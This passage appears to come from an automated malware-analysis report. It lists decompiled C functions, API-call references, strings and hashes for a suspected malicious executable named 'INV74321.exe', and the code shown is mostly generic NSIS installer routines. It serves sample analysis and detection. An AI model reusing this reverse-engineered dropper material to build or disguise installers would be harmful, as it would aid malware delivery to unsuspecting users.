                                                          				_push(_t89);
                                                          				_t66 = _t38 +  *0x42f478;
                                                          				_t39 = 0x42e3c0;
                                                          				_t90 = 0x42e3c0;
                                                          				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
                                                          					_t90 = _a4;
                                                          					_a4 = _a4 & 0x00000000;
                                                          				}
                                                          				while(1) {
                                                          					_t88 =  *_t66;
                                                          					if(_t88 == 0) {
                                                          						break;
                                                          					}
                                                          					__eflags = _t90 - _t39 - 0x400;
                                                          					if(_t90 - _t39 >= 0x400) {
                                                          						break;
                                                          					}
                                                          					_t66 = _t66 + 1;
                                                          					__eflags = _t88 - 4;
                                                          					_a8 = _t66;
                                                          					if(__eflags >= 0) {
                                                          						if(__eflags != 0) {
                                                          							 *_t90 = _t88;
                                                          							_t90 =  &(_t90[1]);
                                                          							__eflags = _t90;
                                                          						} else {
                                                          							 *_t90 =  *_t66;
                                                          							_t90 =  &(_t90[1]);
                                                          							_t66 = _t66 + 1;
                                                          						}
                                                          						continue;
                                                          					}
                                                          					_t41 =  *((char*)(_t66 + 1));
                                                          					_t80 =  *_t66;
                                                          					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                          					_v24 = _t80;
                                                          					_v28 = _t80 | 0x00000080;
                                                          					_v16 = _t41;
                                                          					_v20 = _t41 | 0x00000080;
                                                          					_t66 = _a8 + 2;
                                                          					__eflags = _t88 - 2;
                                                          					if(_t88 != 2) {
                                                          						__eflags = _t88 - 3;
                                                          						if(_t88 != 3) {
                                                          							__eflags = _t88 - 1;
                                                          							if(_t88 == 1) {
                                                          								__eflags = (_t41 | 0xffffffff) - _t97;
                                                          								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                          							}
                                                          							L42:
                                                          							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                          							_t39 = 0x42e3c0;
                                                          							continue;
                                                          						}
                                                          						__eflags = _t97 - 0x1d;
                                                          						if(_t97 != 0x1d) {
                                                          							__eflags = (_t97 << 0xa) + 0x430000;
                                                          							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
                                                          						} else {
                                                          							E00406055(_t90,  *0x42f428);
                                                          						}
                                                          						__eflags = _t97 + 0xffffffeb - 7;
                                                          						if(_t97 + 0xffffffeb < 7) {
                                                          							L33:
                                                          							E004063D2(_t90);
                                                          						}
                                                          						goto L42;
                                                          					}
                                                          					_t52 =  *0x42f42c;
                                                          					__eflags = _t52;
                                                          					_t99 = 2;
                                                          					if(_t52 >= 0) {
                                                          						L13:
                                                          						_a8 = 1;
                                                          						L14:
                                                          						__eflags =  *0x42f4c4;
                                                          						if( *0x42f4c4 != 0) {
                                                          							_t99 = 4;
                                                          						}
                                                          						__eflags = _t80;
                                                          						if(__eflags >= 0) {
                                                          							__eflags = _t80 - 0x25;
                                                          							if(_t80 != 0x25) {
                                                          								__eflags = _t80 - 0x24;
                                                          								if(_t80 == 0x24) {
                                                          									GetWindowsDirectoryA(_t90, 0x400);
                                                          									_t99 = 0;
                                                          								}
                                                          								while(1) {
                                                          									__eflags = _t99;
                                                          									if(_t99 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t53 =  *0x42f424;
                                                          									_t99 = _t99 - 1;
                                                          									__eflags = _t53;
                                                          									if(_t53 == 0) {
                                                          										L26:
                                                          										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                          										__eflags = _t55;
                                                          										if(_t55 != 0) {
                                                          											L28:
                                                          											 *_t90 =  *_t90 & 0x00000000;
                                                          											__eflags =  *_t90;
                                                          											continue;
                                                          										}
                                                          										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                          										_v12 = _t55;
                                                          										__imp__CoTaskMemFree(_v8);
                                                          										__eflags = _v12;
                                                          										if(_v12 != 0) {
                                                          											goto L30;
                                                          										}
                                                          										goto L28;
                                                          									}
                                                          									__eflags = _a8;
                                                          									if(_a8 == 0) {
                                                          										goto L26;
                                                          									}
                                                          									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                          									__eflags = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L26;
                                                          								}
                                                          								goto L30;
                                                          							}
                                                          							GetSystemDirectoryA(_t90, 0x400);
                                                          							goto L30;
                                                          						} else {
                                                          							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
                                                          							__eflags =  *_t90;
                                                          							if( *_t90 != 0) {
                                                          								L31:
                                                          								__eflags = _v16 - 0x1a;
                                                          								if(_v16 == 0x1a) {
                                                          									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                          								}
                                                          								goto L33;
                                                          							}
                                                          							E0040618A(_t66, _t90, _t99, _t90, _v16);
                                                          							L30:
                                                          							__eflags =  *_t90;
                                                          							if( *_t90 == 0) {
                                                          								goto L33;
                                                          							}
                                                          							goto L31;
                                                          						}
                                                          					}
                                                          					__eflags = _t52 - 0x5a04;
                                                          					if(_t52 == 0x5a04) {
                                                          						goto L13;
                                                          					}
                                                          					__eflags = _v16 - 0x23;
                                                          					if(_v16 == 0x23) {
                                                          						goto L13;
                                                          					}
                                                          					__eflags = _v16 - 0x2e;
                                                          					if(_v16 == 0x2e) {
                                                          						goto L13;
                                                          					} else {
                                                          						_a8 = _a8 & 0x00000000;
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				 *_t90 =  *_t90 & 0x00000000;
                                                          				if(_a4 == 0) {
                                                          					return _t39;
                                                          				}
                                                          				return E004060F7(_a4, _t39);
                                                          			}




























                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                                                          • GetWindowsDirectoryA.KERNEL32(GHFGHFGHFDGDFGDFg,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                          • SHGetSpecialFolderLocation.SHELL32(00405256,74B5EA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                          • SHGetPathFromIDListA.SHELL32(74B5EA30,GHFGHFGHFDGDFGDFg), ref: 00406312
                                                          • CoTaskMemFree.OLE32(74B5EA30), ref: 0040631E
                                                          • lstrcatA.KERNEL32(GHFGHFGHFDGDFGDFg,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                          • lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422448,74B5EA30), ref: 00406394
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: GHFGHFGHFDGDFGDFg$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-3709218778
                                                          • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                          • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                          • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                          • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004063D2(CHAR* _a4) {
                                                          				char _t5;
                                                          				char _t7;
                                                          				char* _t15;
                                                          				char* _t16;
                                                          				CHAR* _t17;
                                                          
                                                          				_t17 = _a4;
                                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                          					_t17 =  &(_t17[4]);
                                                          				}
                                                          				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
                                                          					_t17 =  &(_t17[2]);
                                                          				}
                                                          				_t5 =  *_t17;
                                                          				_t15 = _t17;
                                                          				_t16 = _t17;
                                                          				if(_t5 != 0) {
                                                          					do {
                                                          						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
                                                          							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
                                                          							_t16 = CharNextA(_t16);
                                                          						}
                                                          						_t17 = CharNextA(_t17);
                                                          						_t5 =  *_t17;
                                                          					} while (_t5 != 0);
                                                          				}
                                                          				 *_t16 =  *_t16 & 0x00000000;
                                                          				while(1) {
                                                          					_t16 = CharPrevA(_t15, _t16);
                                                          					_t7 =  *_t16;
                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                          						break;
                                                          					}
                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                          					if(_t15 < _t16) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t7;
                                                          			}









                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INV74321.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\INV74321.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                          • CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                          • "C:\Users\user\Desktop\INV74321.exe" , xrefs: 0040640E
                                                          • *?|<>/":, xrefs: 0040641A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3874900187
                                                          • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                          • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				long _t39;
                                                          				long _t41;
                                                          				void* _t44;
                                                          				signed char _t50;
                                                          				long* _t54;
                                                          
                                                          				if(_a4 + 0xfffffecd > 5) {
                                                          					L18:
                                                          					return 0;
                                                          				}
                                                          				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                          					goto L18;
                                                          				} else {
                                                          					_t50 = _t54[5];
                                                          					if((_t50 & 0xffffffe0) != 0) {
                                                          						goto L18;
                                                          					}
                                                          					_t39 =  *_t54;
                                                          					if((_t50 & 0x00000002) != 0) {
                                                          						_t39 = GetSysColor(_t39);
                                                          					}
                                                          					if((_t54[5] & 0x00000001) != 0) {
                                                          						SetTextColor(_a8, _t39);
                                                          					}
                                                          					SetBkMode(_a8, _t54[4]);
                                                          					_t41 = _t54[1];
                                                          					_v16.lbColor = _t41;
                                                          					if((_t54[5] & 0x00000008) != 0) {
                                                          						_t41 = GetSysColor(_t41);
                                                          						_v16.lbColor = _t41;
                                                          					}
                                                          					if((_t54[5] & 0x00000004) != 0) {
                                                          						SetBkColor(_a8, _t41);
                                                          					}
                                                          					if((_t54[5] & 0x00000010) != 0) {
                                                          						_v16.lbStyle = _t54[2];
                                                          						_t44 = _t54[3];
                                                          						if(_t44 != 0) {
                                                          							DeleteObject(_t44);
                                                          						}
                                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                                          					}
                                                          					return _t54[3];
                                                          				}
                                                          			}










                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040521E(CHAR* _a4, CHAR* _a8) {
                                                          				struct HWND__* _v8;
                                                          				signed int _v12;
                                                          				CHAR* _v32;
                                                          				long _v44;
                                                          				int _v48;
                                                          				void* _v52;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				CHAR* _t26;
                                                          				signed int _t27;
                                                          				CHAR* _t28;
                                                          				long _t29;
                                                          				signed int _t39;
                                                          
                                                          				_t26 =  *0x42ec04; // 0x0
                                                          				_v8 = _t26;
                                                          				if(_t26 != 0) {
                                                          					_t27 =  *0x42f4f4;
                                                          					_v12 = _t27;
                                                          					_t39 = _t27 & 0x00000001;
                                                          					if(_t39 == 0) {
                                                          						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
                                                          					}
                                                          					_t26 = lstrlenA(0x42a070);
                                                          					_a4 = _t26;
                                                          					if(_a8 == 0) {
                                                          						L6:
                                                          						if((_v12 & 0x00000004) == 0) {
                                                          							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
                                                          						}
                                                          						if((_v12 & 0x00000002) == 0) {
                                                          							_v32 = 0x42a070;
                                                          							_v52 = 1;
                                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                          							_v44 = 0;
                                                          							_v48 = _t29 - _t39;
                                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                          						}
                                                          						if(_t39 != 0) {
                                                          							_t28 = _a4;
                                                          							 *((char*)(_t28 + 0x42a070)) = 0;
                                                          							return _t28;
                                                          						}
                                                          					} else {
                                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                          						if(_t26 < 0x800) {
                                                          							_t26 = lstrcatA(0x42a070, _a8);
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t26;
                                                          			}


















                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,74B5EA30), ref: 0040527A
                                                          • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                          • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                          • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                          • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
                                                          				long _v8;
                                                          				signed char _v12;
                                                          				unsigned int _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				long _v56;
                                                          				void* _v60;
                                                          				long _t15;
                                                          				unsigned int _t19;
                                                          				signed int _t25;
                                                          				struct HWND__* _t28;
                                                          
                                                          				_t28 = _a4;
                                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                          				if(_a8 == 0) {
                                                          					L4:
                                                          					_v56 = _t15;
                                                          					_v60 = 4;
                                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                          					return _v24;
                                                          				}
                                                          				_t19 = GetMessagePos();
                                                          				_v16 = _t19 >> 0x10;
                                                          				_v20 = _t19;
                                                          				ScreenToClient(_t28,  &_v20);
                                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                          				if((_v12 & 0x00000066) != 0) {
                                                          					_t15 = _v8;
                                                          					goto L4;
                                                          				}
                                                          				return _t25 | 0xffffffff;
                                                          			}














                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                          • GetMessagePos.USER32 ref: 00404AF1
                                                          • ScreenToClient.USER32 ref: 00404B0B
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                          				char _v68;
                                                          				int _t11;
                                                          				int _t20;
                                                          
                                                          				if(_a8 == 0x110) {
                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                          					_a8 = 0x113;
                                                          				}
                                                          				if(_a8 == 0x113) {
                                                          					_t20 =  *0x41d440; // 0x8d79e
                                                          					_t11 =  *0x42944c;
                                                          					if(_t20 >= _t11) {
                                                          						_t20 = _t11;
                                                          					}
                                                          					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                          					SetWindowTextA(_a4,  &_v68);
                                                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                          				}
                                                          				return 0;
                                                          			}






                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                          • MulDiv.KERNEL32(0008D79E,00000064,?), ref: 00402E00
                                                          • wsprintfA.USER32 ref: 00402E10
                                                          • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                          • SetDlgItemTextA.USER32 ref: 00402E32
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                          • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E004027DF(int __ebx) {
                                                          				void* _t26;
                                                          				long _t31;
                                                          				int _t45;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				void* _t56;
                                                          
                                                          				_t45 = __ebx;
                                                          				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                          				_t50 = E00402BCE(0xfffffff0);
                                                          				 *(_t56 - 0x78) = _t23;
                                                          				if(E00405AFC(_t50) == 0) {
                                                          					E00402BCE(0xffffffed);
                                                          				}
                                                          				E00405C6B(_t50);
                                                          				_t26 = E00405C90(_t50, 0x40000000, 2);
                                                          				 *(_t56 + 8) = _t26;
                                                          				if(_t26 != 0xffffffff) {
                                                          					_t31 =  *0x42f438;
                                                          					 *(_t56 - 0x30) = _t31;
                                                          					_t49 = GlobalAlloc(0x40, _t31);
                                                          					if(_t49 != _t45) {
                                                          						E00403300(_t45);
                                                          						E004032EA(_t49,  *(_t56 - 0x30));
                                                          						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                          						 *(_t56 - 0x38) = _t54;
                                                          						if(_t54 != _t45) {
                                                          							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                          							while( *_t54 != _t45) {
                                                          								_t47 =  *_t54;
                                                          								_t55 = _t54 + 8;
                                                          								 *(_t56 - 0x8c) =  *_t54;
                                                          								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                          								_t54 = _t55 +  *(_t56 - 0x8c);
                                                          							}
                                                          							GlobalFree( *(_t56 - 0x38));
                                                          						}
                                                          						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                          						GlobalFree(_t49);
                                                          						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                          					}
                                                          					CloseHandle( *(_t56 + 8));
                                                          				}
                                                          				_t51 = 0xfffffff3;
                                                          				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                          					_t51 = 0xffffffef;
                                                          					DeleteFileA( *(_t56 - 0x78));
                                                          					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                          				}
                                                          				_push(_t51);
                                                          				E00401423();
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
                                                          				return 0;
                                                          			}











                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                          • GlobalFree.KERNEL32 ref: 0040288E
                                                          • GlobalFree.KERNEL32 ref: 004028A1
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                          • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 48%
                                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				char _v276;
                                                          				void* _t27;
                                                          				signed int _t33;
                                                          				intOrPtr* _t35;
